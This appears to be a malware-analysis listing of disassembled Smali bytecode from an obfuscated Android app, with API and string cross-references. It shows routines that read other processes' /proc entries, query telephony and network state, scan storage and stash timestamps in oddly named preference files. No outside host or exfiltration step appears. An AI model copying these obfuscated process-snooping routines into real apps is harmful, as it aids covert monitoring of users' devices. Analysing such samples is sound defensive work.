6throw v0
7cond_a:
8iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
9if-eqz v0, :cond_16
10new-instance v0, Ljava/lang/IllegalStateException;
12const-string v1, "CrashlyticsCore Kit already set."
14invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
15throw v0
16cond_16: iput-object p1, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->core:Lmpcom/crashlytics/android/core/CrashlyticsCore;
17return-object p0
Cross References
APIs
  • org.json.JSONObject.optString
  • org.json.JSONObject.optInt
Strings
  • label
  • loadTime
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
2invoke-direct {v0}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;-><init>()V
4const-string v1, "label"
6invoke-virtual {p0, v1}, Lorg/json/JSONObject;->optString(Ljava/lang/String;)Ljava/lang/String;
7move-result-object v1
8iput-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ:Ljava/lang/String;
10const-string v1, "loadTime"
12invoke-virtual {p0, v1}, Lorg/json/JSONObject;->optInt(Ljava/lang/String;)I
13move-result v1
14iput v1, v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->Odjrct:I
15return-object v0
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.lang.String.format
  • com.czybg.eqtbdmzpklrgyns.bhrmCXSP.<init>
Strings
  • /proc/%d/cgroup
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;
2const-string v1, "/proc/%d/cgroup"
3const/4 v2, 0x1
4new-array v2, v2, [Ljava/lang/Object;
5const/4 v3, 0x0
7invoke-static {p0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
8move-result-object v4
9aput-object v4, v2, v3
11invoke-static {v1, v2}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
12move-result-object v1
14invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;-><init>(Ljava/lang/String;)V
15return-object v0
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.lang.String.format
  • com.czybg.eqtbdmzpklrgyns.jAdeqNK.<init>
Strings
  • /proc/%d/stat
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;
2const-string v1, "/proc/%d/stat"
3const/4 v2, 0x1
4new-array v2, v2, [Ljava/lang/Object;
5const/4 v3, 0x0
7invoke-static {p0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
8move-result-object v4
9aput-object v4, v2, v3
11invoke-static {v1, v2}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
12move-result-object v1
14invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;-><init>(Ljava/lang/String;)V
15return-object v0
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.lang.String.format
  • com.czybg.eqtbdmzpklrgyns.xGabTJZc.<init>
Strings
  • /proc/%d/status
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;
2const-string v1, "/proc/%d/status"
3const/4 v2, 0x1
4new-array v2, v2, [Ljava/lang/Object;
5const/4 v3, 0x0
7invoke-static {p0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
8move-result-object v4
9aput-object v4, v2, v3
11invoke-static {v1, v2}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
12move-result-object v1
14invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;-><init>(Ljava/lang/String;)V
15return-object v0
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.lang.String.format
  • java.lang.Exception.<init>
Strings
  • The process %d does not belong to any application
Position Instruction Meta Information
1const-string v0, "The process %d does not belong to any application"
2const/4 v1, 0x1
3new-array v1, v1, [Ljava/lang/Object;
4const/4 v2, 0x0
6invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
7move-result-object v3
8aput-object v3, v1, v2
10invoke-static {v0, v1}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
11move-result-object v0
13invoke-direct {p0, v0}, Ljava/lang/Exception;-><init>(Ljava/lang/String;)V
14return-void
Cross References
APIs
  • org.json.JSONObject.getLong
Strings
  • delay
  • createdAt
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
2const-string v1, "delay"
4invoke-virtual {p0, v1}, Lorg/json/JSONObject;->getLong(Ljava/lang/String;)J
5move-result-wide v1
7const-string v3, "createdAt"
9invoke-virtual {p0, v3}, Lorg/json/JSONObject;->getLong(Ljava/lang/String;)J
10move-result-wide v3
12invoke-direct {v0, v1, v2, v3, v4}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;-><init>(JJ)V
13return-object v0
Cross References
APIs
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putLong
  • android.content.SharedPreferences$Editor.commit
Strings
  • noActiveDomainTime
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
3invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
4move-result-object v0
6const-string v1, "noActiveDomainTime"
8invoke-interface {v0, v1, p1, p2}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;
9move-result-object v0
11invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
12return-void
Cross References
APIs
  • android.content.Context.getSystemService
Strings
  • phone
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->LmcGi:Landroid/telephony/TelephonyManager;
2if-nez v0, :cond_10
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->DiXsQ:Landroid/content/Context;
6const-string v1, "phone"
8invoke-virtual {v0, v1}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
9move-result-object v0
10check-cast v0, Landroid/telephony/TelephonyManager;
11iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->LmcGi:Landroid/telephony/TelephonyManager;
12cond_10:
13iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->LmcGi:Landroid/telephony/TelephonyManager;
14return-object v0
APIs
  • android.os.Handler.removeCallbacksAndMessages
  • android.os.Handler.postDelayed
  • android.os.Handler.removeCallbacksAndMessages
  • android.os.Handler.postDelayed
Position Instruction Meta Information
0const/4 v2, 0x0
1instance-of v0, p1, Ljavax/net/ssl/SSLHandshakeException;
2if-eqz v0, :cond_38
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
6iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
8invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
9move-result-object v1
11invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;)V
13iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
15invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
16move-result-object v0
18invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct()Ljava/util/List;
19move-result-object v1
21invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->Odjrct(Ljava/util/List;)V
23iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
25invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Landroid/os/Handler;
26move-result-object v0
28invoke-virtual {v0, v2}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
30iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
32invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Landroid/os/Handler;
33move-result-object v0
34new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/xfPEz;
36invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/xfPEz;-><init>(Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;)V
37const-wide/32 v2, 0x249f00
39invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
40goto_37: return-void
41cond_38:
42iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
44invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Landroid/os/Handler;
45move-result-object v0
47invoke-virtual {v0, v2}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
49iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
51invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Landroid/os/Handler;
52move-result-object v0
53new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/IwTvjRW;
55invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/IwTvjRW;-><init>(Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;)V
56const-wide/32 v2, 0x6ddd00
58invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
59goto/16 :goto_37
APIs
  • android.os.Handler.removeCallbacksAndMessages
  • android.app.Activity.finish
  • android.os.Handler.post
Position Instruction Meta Information
0const/4 v2, 0x0
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->DiXsQ:Landroid/app/Activity;
4invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->LmcGi(Landroid/content/Context;)Z
5move-result v0
6if-eqz v0, :cond_14
8iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->Odjrct:Landroid/os/Handler;
10invoke-virtual {v0, v2}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
12iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->DiXsQ:Landroid/app/Activity;
14invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->Odjrct(Landroid/content/Context;)V
15goto_13: return-void
16cond_14:
17iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;
19invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;)Z
20move-result v0
21if-nez v0, :cond_38
23iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->DiXsQ:Landroid/app/Activity;
25invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Context;)Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
26move-result-object v0
28iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
29const/4 v1, 0x0
31invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ(Z)V
33iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->DiXsQ:Landroid/app/Activity;
35invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;->LmcGi(Landroid/app/Activity;)V
37iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->Odjrct:Landroid/os/Handler;
39invoke-virtual {v0, v2}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
41iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->DiXsQ:Landroid/app/Activity;
43invoke-virtual {v0}, Landroid/app/Activity;->finish()V
44goto/16 :goto_13
45cond_38:
46iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/oFwjTKzY;->Odjrct:Landroid/os/Handler;
48invoke-virtual {v0, p0}, Landroid/os/Handler;->post(Ljava/lang/Runnable;)Z
49goto/16 :goto_13
Cross References
APIs
  • android.os.Environment.getExternalStoragePublicDirectory
  • java.io.File.toString
  • java.io.File.listRoots
  • java.io.File.toString
Position Instruction Meta Information
1sget-object v0, Landroid/os/Environment;->DIRECTORY_DOWNLOADS:Ljava/lang/String;
3invoke-static {v0}, Landroid/os/Environment;->getExternalStoragePublicDirectory(Ljava/lang/String;)Ljava/io/File;
4move-result-object v0
6invoke-virtual {v0}, Ljava/io/File;->toString()Ljava/lang/String;
7move-result-object v0
9invoke-direct {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->LmcGi(Ljava/lang/String;)Ljava/lang/String;
10move-result-object v0
11if-nez v0, :cond_25
13invoke-static {}, Ljava/io/File;->listRoots()[Ljava/io/File;
14move-result-object v2
15array-length v3, v2
16const/4 v0, 0x0
17move v1, v0
18goto_17: if-ge v1, v3, :cond_2a
19aget-object v0, v2, v1
21invoke-virtual {v0}, Ljava/io/File;->toString()Ljava/lang/String;
22move-result-object v0
24invoke-direct {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->LmcGi(Ljava/lang/String;)Ljava/lang/String;
25move-result-object v0
26if-eqz v0, :cond_26
27goto_25: return-object v0
28cond_26: add-int/lit8 v0, v1, 0x1
29move v1, v0
30goto/16 :goto_17
31cond_2a:
32const-string v0, ""
33goto/16 :goto_25
APIs
  • com.czybg.eqtbdmzpklrgyns.BYdZZAIwCWFdZwW.DiXsQ
  • com.czybg.eqtbdmzpklrgyns.dclBIK.<init>
  • android.os.AsyncTask.executeOnExecutor
  • android.os.AsyncTask.execute
Position Instruction Meta Information
0const/4 v3, 0x0
2invoke-static {p1}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Context;)Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
3move-result-object v0
5invoke-virtual {v0, p2}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Intent;)V
6new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
8invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
10invoke-static {p1, v0}, Lcom/czybg/eqtbdmzpklrgyns/BYdZZAIwCWFdZwW;->DiXsQ(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;)Lorg/json/JSONObject;
11move-result-object v0
12if-eqz v0, :cond_29
14invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ()Ljava/lang/String;
15move-result-object v1
16new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/dclBIK;
18invoke-direct {v2, v1, v0}, Lcom/czybg/eqtbdmzpklrgyns/dclBIK;-><init>(Ljava/lang/String;Lorg/json/JSONObject;)V
19sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
20const/16 v1, 0xb
21if-lt v0, v1, :cond_2a
23sget-object v0, Landroid/os/AsyncTask;->THREAD_POOL_EXECUTOR:Ljava/util/concurrent/Executor;
24new-array v1, v3, [Ljava/lang/Void;
26invoke-virtual {v2, v0, v1}, Landroid/os/AsyncTask;->executeOnExecutor(Ljava/util/concurrent/Executor;[Ljava/lang/Object;)Landroid/os/AsyncTask;
27cond_29: return-void
28cond_2a: new-array v0, v3, [Ljava/lang/Void;
30invoke-virtual {v2, v0}, Landroid/os/AsyncTask;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
31goto/16 :goto_29
Cross References
APIs
  • java.lang.Object.<init>
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • java.util.ArrayList.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2new-instance v0, Landroid/os/Handler;
4invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
5move-result-object v1
7invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
8iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->hZyMGHgz:Landroid/os/Handler;
9new-instance v0, Ljava/util/ArrayList;
11invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
12iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->Odjrct:Ljava/util/ArrayList;
13iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->xnLvoQ:Landroid/content/Context;
14iput-object p2, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/KUAcDFYW;
15new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;
17invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;-><init>(Landroid/content/Context;)V
18iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/XpiFj;
20iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/XpiFj;
22invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->DiXsQ()Ljava/util/ArrayList;
23move-result-object v0
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->Odjrct:Ljava/util/ArrayList;
25return-void
Cross References
Strings
  • undefined
  • 2G
  • 3G
  • 4G
Position Instruction Meta Information
1invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->xnLvoQ()I
2move-result v0
3packed-switch v0, :pswitch_data_16
5const-string v0, "undefined"
6goto_9: return-object v0
7pswitch_a:
8const-string v0, "2G"
9goto/16 :goto_9
10pswitch_d:
11const-string v0, "3G"
12goto/16 :goto_9
13pswitch_10:
14const-string v0, "4G"
15goto/16 :goto_9
16pswitch_13:
17const-string v0, "undefined"
18goto/16 :goto_9
APIs
  • android.content.Intent.<init>
  • android.content.Intent.addFlags
  • com.czybg.eqtbdmzpklrgyns.SplashActivity.startActivity
  • com.czybg.eqtbdmzpklrgyns.SplashActivity.finish
Position Instruction Meta Information
0.prologue
1new-instance v0, Landroid/content/Intent;
3iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;
4const-class v2, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;
6invoke-direct {v0, v1, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
7const v1, 0x4018000
9invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
11iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;
13invoke-virtual {v1, v0}, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;->startActivity(Landroid/content/Intent;)V
15iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;
17invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;->finish()V
18return-void
Cross References
APIs
  • java.lang.Object.<init>
  • android.os.Parcel.readInt
  • android.os.Parcel.readString
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3invoke-virtual {p1}, Landroid/os/Parcel;->readInt()I
4move-result v0
5iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->DiXsQ:I
7invoke-virtual {p1}, Landroid/os/Parcel;->readString()Ljava/lang/String;
8move-result-object v0
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->Odjrct:Ljava/lang/String;
11invoke-virtual {p1}, Landroid/os/Parcel;->readString()Ljava/lang/String;
12move-result-object v0
13iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
14return-void
APIs
  • java.lang.Integer.valueOf
  • java.lang.String.format
Strings
  • %d:%s:%s
Position Instruction Meta Information
1const-string v0, "%d:%s:%s"
2const/4 v1, 0x3
3new-array v1, v1, [Ljava/lang/Object;
4const/4 v2, 0x0
5iget v3, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->DiXsQ:I
7invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
8move-result-object v3
9aput-object v3, v1, v2
10const/4 v2, 0x1
12iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->Odjrct:Ljava/lang/String;
13aput-object v3, v1, v2
14const/4 v2, 0x2
16iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
17aput-object v3, v1, v2
19invoke-static {v0, v1}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
20move-result-object v0
21return-object v0
Cross References
APIs
  • java.lang.Object.<init>
  • android.content.Context.getSharedPreferences
Strings
  • infMrkPst
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3const-string v0, "infMrkPst"
4const/4 v1, 0x0
6invoke-virtual {p1, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
7move-result-object v0
8iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->Odjrct:Landroid/content/SharedPreferences;
10invoke-static {p1}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->LmcGi(Landroid/content/Context;)Ljava/lang/String;
11move-result-object v0
12iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->hZyMGHgz:Ljava/lang/String;
13iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->xnLvoQ:Landroid/content/Context;
14return-void
APIs
  • java.io.File.<init>
  • java.io.File.exists
Strings
  • /dev/cpuctl/tasks
Position Instruction Meta Information
0new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/NmMpKq;
2invoke-direct {v0}, Lcom/czybg/eqtbdmzpklrgyns/NmMpKq;-><init>()V
3sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->CREATOR:Landroid/os/Parcelable$Creator;
4new-instance v0, Ljava/io/File;
6const-string v1, "/dev/cpuctl/tasks"
8invoke-direct {v0, v1}, Ljava/io/File;-><init>(Ljava/lang/String;)V
10invoke-virtual {v0}, Ljava/io/File;->exists()Z
11move-result v0
12sput-boolean v0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->xnLvoQ:Z
13return-void
Cross References
APIs
  • java.lang.Object.<init>
  • android.content.Context.getSharedPreferences
Strings
  • fasfgasfasfsa
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3const-string v0, "fasfgasfasfsa"
4const/4 v1, 0x0
6invoke-virtual {p1, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
7move-result-object v0
8iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->DiXsQ:Landroid/content/SharedPreferences;
10invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->Odjrct()J
11return-void
Cross References
APIs
  • java.lang.Object.<init>
  • android.content.Context.getSystemService
Strings
  • connectivity
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->DiXsQ:Landroid/content/Context;
4const-string v0, "connectivity"
6invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
7move-result-object v0
8check-cast v0, Landroid/net/ConnectivityManager;
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
10return-void
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.<init>
  • java.lang.String.split
Strings
  • \\s+
Position Instruction Meta Information
1invoke-direct {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;-><init>(Ljava/lang/String;)V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->Odjrct:Ljava/lang/String;
5const-string v1, "\\s+"
7invoke-virtual {v0, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
8move-result-object v0
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ:[Ljava/lang/String;
10return-void
Cross References
APIs
  • java.lang.Object.<init>
  • android.content.Context.getSharedPreferences
Strings
  • inf.storage
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3const-string v0, "inf.storage"
4const/4 v1, 0x0
6invoke-virtual {p1, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
7move-result-object v0
8iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
9return-void
Cross References
APIs
  • java.net.URLConnection.setRequestProperty
Strings
  • Accept-Encoding
  • gzip
Position Instruction Meta Information
1const-string v0, "Accept-Encoding"
3const-string v1, "gzip"
5invoke-virtual {p0, v0, v1}, Ljava/net/URLConnection;->setRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
6return-void
Cross References
APIs
  • java.lang.Math.min
  • java.lang.String.<init>
Position Instruction Meta Information
0const/4 v8, 0x4
1const/4 v1, 0x0
2new-array v4, v8, [B
3fill-array-data v4, :array_46
4array-length v0, p0
6invoke-static {v0, p1}, Ljava/lang/Math;->min(II)I
7move-result v5
8add-int/lit8 v0, v5, -0x4
9add-int/lit8 v0, v0, -0x16
10move v3, v0
11goto_11: if-ltz v3, :cond_44
12const/4 v0, 0x1
13move v2, v1
14goto_15: if-ge v2, v8, :cond_20
15add-int v6, v3, v2
16aget-byte v6, p0, v6
17aget-byte v7, v4, v2
18if-eq v6, v7, :cond_3d
19move v0, v1
20cond_20: if-eqz v0, :cond_40
21add-int/lit8 v0, v3, 0x14
22aget-byte v0, p0, v0
23add-int/lit8 v1, v3, 0x15
24aget-byte v1, p0, v1
25mul-int/lit16 v1, v1, 0x100
26add-int/2addr v1, v0
27sub-int v0, v5, v3
28add-int/lit8 v2, v0, -0x16
29new-instance v0, Ljava/lang/String;
30add-int/lit8 v3, v3, 0x16
32invoke-static {v1, v2}, Ljava/lang/Math;->min(II)I
33move-result v1
35invoke-direct {v0, p0, v3, v1}, Ljava/lang/String;-><init>([BII)V
36goto_3c: return-object v0
37cond_3d: add-int/lit8 v2, v2, 0x1
38goto/16 :goto_15
39cond_40: add-int/lit8 v0, v3, -0x1
40move v3, v0
41goto/16 :goto_11
42cond_44: const/4 v0, 0x0
43goto/16 :goto_3c
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
3invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
4move-result-object v2
5cond_6:
6invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
7move-result v0
8if-eqz v0, :cond_28
10invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
11move-result-object v0
12check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
13iget-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
14if-nez v1, :cond_6
